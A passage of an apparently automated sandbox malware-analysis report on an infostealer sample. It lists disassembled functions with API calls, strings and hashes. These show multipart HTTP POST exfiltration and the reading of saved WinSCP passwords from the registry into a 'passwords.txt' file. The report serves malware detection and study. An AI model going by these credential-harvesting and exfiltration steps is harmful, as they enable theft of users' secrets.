                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$Heap$lstrcpy$Process$Httpmemcpy$AllocateBinaryCloseCryptFileHandleOpenReadRequestStringlstrcat$ConnectCrackErrorExitFreeInfoLastOptionQuerySendSleep
                                                                                                                                                                                                                                                                                                  • String ID: ------$"$--$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$block$build_id$file_data$file_name$https$token
                                                                                                                                                                                                                                                                                                  • API String ID: 1851392271-2620489619
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4b79130a0f4ea3545f79df70e1b297391bfff2f976d9b237d9fafe9a9eb16a72
                                                                                                                                                                                                                                                                                                  • Instruction ID: bceff4d112c07ef55503c2bfa5bbc07c75ab0ef13ec91c0f48555253a5be1088
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b79130a0f4ea3545f79df70e1b297391bfff2f976d9b237d9fafe9a9eb16a72
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A2263307105286BDB05BBA19C96AFF67699F84748F40006EF4066B281DFBC5EC687ED
                                                                                                                                                                                                                                                                                                  Function 00403920 Relevance: 72.4, APIs: 30, Strings: 11, Instructions: 633networkmemorystringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1881 403920-4039d0 call 410200 call 402790 call 4101c0 * 5 call 410530 InternetOpenA StrCmpCA 1898 404010-404031 InternetCloseHandle call 410530 call 407790 1881->1898 1899 4039d6-403b13 call 4113b0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 4102e0 call 410290 call 410230 * 2 InternetConnectA 1881->1899 1909 404081-404098 call 411250 * 2 call 410200 1898->1909 1910 404033-40407e call 410240 call 410340 call 410290 call 410230 GetProcessHeap HeapFree 1898->1910 1899->1898 1990 403b19-403b56 HttpOpenRequestA 1899->1990 1926 40409d-4040f6 call 410230 * 10 1909->1926 1910->1909 1991 404006-40400d InternetCloseHandle 1990->1991 1992 403b5c-403b61 1990->1992 1991->1898 1993 403b63-403b75 InternetSetOptionA 1992->1993 1994 403b7b-403e45 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 401390 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410530 lstrlenA call 410530 lstrlenA GetProcessHeap HeapAlloc 1992->1994 1993->1994 2139 403f35-403f5d InternetCloseHandle * 3 call 4101c0 1994->2139 2140 403e4b-403eb3 call 410530 * 2 lstrlenA memcpy call 410530 lstrlenA call 410530 * 2 lstrlenA memcpy 1994->2140 2139->1926 2153 403ec0-403ef4 call 410530 lstrlenA call 410530 2140->2153 2159 403f62-403f7e call 411250 GetProcessHeap HeapFree 2153->2159 2160 403ef6-403f09 Sleep 2153->2160 2166 403f80-403f9b InternetReadFile 2159->2166 2162 403f10-403f33 call 411250 GetProcessHeap HeapFree 2160->2162 2163 403f0b-403f0e 2160->2163 2162->2139 2162->2166 2163->2153 2163->2162 2168 403ff7-404003 InternetCloseHandle 2166->2168 2169 403f9d-403fa2 2166->2169 2168->1991 2169->2168 2170 403fa4-403fa7 2169->2170 2171 403fb0-403fee call 410340 call 410290 call 410230 InternetReadFile 2170->2171 2171->2168 2178 403ff0-403ff5 2171->2178 2178->2168 2178->2171
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(?,?,?,?,?), ref: 004039B9
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 004039C8
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 00403B08
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00403B4B
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,00010300,00000004), ref: 00403B75
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,",?,?,mode,?,?,Content-Disposition: form-data; name=",?,?,00421505), ref: 00403E15
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00403E28
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00403E34
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000000), ref: 00403E41
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00403E66
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 00403E6B
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403E82
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403EA4
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403EA9
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403ED9
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403EFD
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403F22
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?), ref: 00403F2C
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00403F38
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00403F41
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00417786), ref: 00403F4A
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403F74
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?), ref: 00403F7E
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000000C7,?), ref: 00403F93
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,00000000,000000C7,?), ref: 00403FE6
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00403FFA
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404007
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404011
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,0042150A,00000000,?,?,?,?,?,?,?), ref: 0040406D
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0040407C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$lstrlen$Heap$CloseHandle$lstrcpy$Process$Free$FileOpenReadlstrcatmemcpy$AllocConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                                                                  • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$mode$token
                                                                                                                                                                                                                                                                                                  • API String ID: 2829941862-3466435155
                                                                                                                                                                                                                                                                                                  • Opcode ID: 861cb8dae58485ddebc8c38636aeaaa6a9d7a4680efb3a25b371246ffcd3b1fe
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5b37cdde6ef0ecb750ac5b7d415ead0f9e62264991208947704b3bc77561ae75
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 861cb8dae58485ddebc8c38636aeaaa6a9d7a4680efb3a25b371246ffcd3b1fe
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1312523171011867CB15BBA29C9AAFF6B6A9FC4704F40005EF4066B291DFBC5DC6C7A9
                                                                                                                                                                                                                                                                                                  Function 00418610 Relevance: 70.2, APIs: 6, Strings: 34, Instructions: 150libraryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 2179 418610-418622 GetModuleHandleA 2180 4187e6-41883e LoadLibraryA * 5 2179->2180 2181 418628-4187e1 call 404df0 * 21 2179->2181 2182 418840-418850 call 404df0 2180->2182 2183 418855-418857 2180->2183 2181->2180 2182->2183 2186 418859-418879 call 404df0 * 2 2183->2186 2187 41887e-418885 2183->2187 2186->2187 2189 418897-41889e 2187->2189 2190 418887-418892 call 404df0 2187->2190 2195 4188b0-4188b7 2189->2195 2196 4188a0-4188ab call 404df0 2189->2196 2190->2189 2202 4188b9-4188d9 call 404df0 * 2 2195->2202 2203 4188de 2195->2203 2196->2195 2202->2203
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,004185CA), ref: 00418615
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 004187EB
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004187FB
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(user32.dll), ref: 0041880B
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(crypt32.dll), ref: 0041881B
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041882B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$HandleModule
                                                                                                                                                                                                                                                                                                  • String ID: CloseHandle$CreateDCA$CreateEventA$CryptStringToBinaryA$ExitProcess$GetComputerNameA$GetCurrentProcess$GetDeviceCaps$GetProcAddress$GetProcessHeap$GetSystemInfo$GetSystemTime$GetUserDefaultLangID$GetUserNameA$GlobalMemoryStatusEx$LoadLibraryA$NtQueryInformationProcess$OpenEventA$ReleaseDC$Sleep$SystemTimeToFileTime$VirtualAlloc$VirtualAllocExNuma$VirtualFree$advapi32.dll$crypt32.dll$gdi32.dll$kernel32.dll$lstrcatA$lstrcpyA$lstrlenA$ntdll.dll$sscanf$user32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2593893887-2466989068
                                                                                                                                                                                                                                                                                                  • Opcode ID: b0d94fdff95e889663e20a71a92f9650b874d673670a684f651acea377882e8d
                                                                                                                                                                                                                                                                                                  • Instruction ID: fa4f152899c94b2b2f6a7a6abf1eb692faa9c8451fb2198c09e274f393329d92
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0d94fdff95e889663e20a71a92f9650b874d673670a684f651acea377882e8d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2951B4B0A45750AFD711AF25FD42B257AA3EB80705354203FB902A71F3DBBA5450AFE8
                                                                                                                                                                                                                                                                                                  Function 0040D9C0 Relevance: 58.1, APIs: 18, Strings: 15, Instructions: 370registrystringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 2447 40d9c0-40da5d memset * 4 RegOpenKeyExA 2448 40daa2-40dac8 call 410230 * 4 2447->2448 2449 40da5f-40da87 RegGetValueA 2447->2449 2451 40da89-40da8c 2449->2451 2452 40da8e-40da95 2449->2452 2454 40da97-40da99 2451->2454 2452->2454 2455 40dacb-40dacd 2452->2455 2454->2448 2459 40da9b-40da9c RegCloseKey 2454->2459 2457 40dadd-40daf4 RegOpenKeyExA 2455->2457 2458 40dacf-40dad6 RegCloseKey 2455->2458 2457->2448 2461 40daf6-40db22 RegEnumKeyExA 2457->2461 2458->2457 2459->2448 2461->2451 2463 40db28-40db3e call 4101c0 2461->2463 2469 40dbb2-40dc51 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 RegGetValueA 2463->2469 2489 40dc53-40dc6a call 410340 call 410290 2469->2489 2490 40dc6c-40dc90 call 411ea0 call 4102e0 call 410290 call 410230 2469->2490 2499 40dc92-40dd5c call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 RegGetValueA call 410340 call 410290 call 410230 StrCmpCA 2489->2499 2490->2499 2531 40dd62-40dd80 call 40d250 2499->2531 2532 40db4b-40dbac call 410340 call 410290 call 410230 RegEnumKeyExA 2499->2532 2538 40dd82 2531->2538 2539 40dd85-40dda9 call 410340 call 410290 call 410230 2531->2539 2532->2469 2546 40dde4-40de5c call 410530 lstrlenA call 410530 call 4101c0 call 406f80 call 413e50 call 410230 2532->2546 2538->2539 2539->2532 2552 40ddaf-40ddbe 2539->2552 2570 40de6c-40de77 call 410230 2546->2570 2571 40de5e-40de65 RegCloseKey 2546->2571 2554 40db42-40db48 ??3@YAXPAX@Z 2552->2554 2555 40ddc4-40ddc6 2552->2555 2554->2532 2557 40ddc8-40ddcd 2555->2557 2558 40dddf _invalid_parameter_noinfo_noreturn 2555->2558 2557->2558 2560 40ddcf-40ddd4 2557->2560 2558->2546 2560->2558 2562 40ddd6-40ddd9 2560->2562 2562->2558 2564 40db40 2562->2564 2564->2554 2570->2448 2571->2570
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D9DD
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D9FA
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DA10
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DA26
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040DA9C
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040DAD0
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040DAEC
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 0040DB1A
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 0040DB9D
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040DB43
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,00000004,?,?,?), ref: 0040DC49
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,00000400,?,?,00421509,?,?,?), ref: 0040DD2C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042150A,?,?,Password: ), ref: 0040DD54
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?), ref: 0040DDDF
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040DDFE
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,passwords.txt), ref: 0040DE5F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411EA0: wsprintfA.USER32 ref: 00411EB5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
